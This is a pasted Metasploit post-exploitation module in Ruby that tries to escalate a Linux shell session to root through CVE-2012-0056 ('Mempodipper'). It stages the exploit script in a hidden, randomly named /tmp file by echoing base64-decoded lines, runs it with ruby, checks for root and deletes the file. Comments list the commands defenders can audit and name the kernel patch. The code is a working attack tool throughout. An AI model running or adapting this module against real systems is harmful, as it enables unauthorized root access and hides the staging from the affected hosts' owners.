
Untitled

a guest
Jan 26th, 2012
  1. ##
  2. # $Id$
  3. ##
  4.  
  5. ##
  6. # This file is part of the Metasploit Framework and may be subject to
  7. # redistribution and commercial restrictions. Please see the Metasploit
  8. # Framework web site for more information on licensing and terms of use.
  9. # http://metasploit.com/framework/
  10. ##
  11.  
  12. require 'msf/core'
  13. require 'rex'
  14. require 'msf/core/post/common'
  15. require 'msf/core/post/file'
  16. require 'msf/core/post/linux/priv'
  17. require 'msf/core/post/linux/system'
  18.  
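  # Metasploit post module that tries to elevate an existing Linux shell
  # session to root by staging and running the framework's CVE-2012-0056
  # ("Mempodipper") script on the target host.
  #
  # Defender notes, all derived from what this code does on the target:
  # * it probes for tooling with `which objdump` and `which ruby`;
  # * it writes a hidden file /tmp/.<8 random letters>.rb, built up by one
  #   `echo <base64> | base64 -d >> <file>` shell command per script line;
  # * it runs that file with `ruby` and finally deletes it with `rm`.
  # Command/process auditing that records these invocations survives the
  # final `rm`. The underlying fix is the vendor kernel update for
  # CVE-2012-0056.
  class Metasploit3 < Msf::Post

    include Msf::Post::Common
    include Msf::Post::File
    include Msf::Post::Linux::Priv
    include Msf::Post::Linux::System

    # Registers the module metadata with the framework.
    #
    # @param info [Hash] metadata supplied by the framework, merged through
    #   update_info with the values below
    def initialize(info = {})
      super(update_info(info,
        'Name'          => 'Exploit CVE-2012-0056 to get root',
        'Description'   => %q{ This module try elevate your privilages by exploitng CVE-2012-0056},
        'License'       => MSF_LICENSE,
        'Author'        => [ 'mak' ],
        'Version'       => '$Revision$',
        'Platform'      => [ 'linux' ],
        'SessionTypes'  => [ 'shell' ] # shell sessions only; original author's note: "no mete for now?"
      ))
    end

    # Module entry point: checks preconditions, stages the script on the
    # target, runs it, reports whether the session is now root, and removes
    # the staged file.
    #
    # @return [nil]
    def run
      print_status("Using cve-2012-56 to elevete privs on session #{session.inspect}...")

      # Nothing to do when the session already runs as root.
      if is_root?
        print_status "Already root, so no need to upgrade permissions. Aborting."
        return
      end

      objdump_bin = cmd_exec("which objdump")
      ruby_bin = cmd_exec("which ruby")

      # Both tools are required: the check aborts when EITHER lookup comes
      # back empty, although the message wording suggests one would suffice.
      if [objdump_bin, ruby_bin].any?(&:empty?)
        # Fixed: the original called the misspelled `print_erorr`, which does
        # not exist and raised NoMethodError instead of printing this message.
        print_error "This exploit is usless without etiher objdump or ruby on owned machine"
        return
      end

      # Hidden, randomly named staging file under /tmp. The name is built only
      # from Rex::Text.rand_text_alpha output, so interpolating it into the
      # shell commands below does not introduce shell metacharacters.
      sploit_file = "/tmp/." + Rex::Text.rand_text_alpha(8) + '.rb'

      print_status "Coping exploit to #{sploit_file} it may take a while"

      begin
        # One 240-second budget covers both the line-by-line upload and the
        # execution of the staged script.
        ::Timeout.timeout(240) do
          # Each line is base64-encoded before being echoed so its content is
          # never interpreted by the remote shell; the trailing `echo ''`
          # restores the newline removed by split.
          generate_exploit.split("\n").each do |line|
            encoded = Rex::Text.encode_base64(line)
            cmd_exec("echo #{encoded} | base64 -d >> #{sploit_file} ; echo '' >> #{sploit_file}")
          end

          print_status "Lunching exploit..."

          cmd_exec("ruby #{sploit_file}")
        end
      rescue ::Timeout::Error
        print_error "mempodipper: failed du to timeout"
      rescue
        # Any other StandardError, including a failure to read the local
        # script in generate_exploit, ends up here.
        print_error "mempodipper failed. Check the session log."
      end

      # Success is decided by re-checking the session's privileges, not by
      # the script's output.
      if is_root?
        print_good "Got root. Nice."
      else
        print_error "Sorry Mempodipper faild."
      end

      # Remove the staged file whether or not the attempt succeeded.
      cmd_exec "rm #{sploit_file}"
    end

    # Reads the CVE-2012-0056 script shipped under the framework's
    # data/exploits directory.
    #
    # @return [String] raw bytes of the script file
    # @raise [SystemCallError] if the file is missing or unreadable
    def generate_exploit
      file = ::File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-0056.rb")

      ::File.open(file, "rb") { |f| f.read(f.stat.size) }
    end
  end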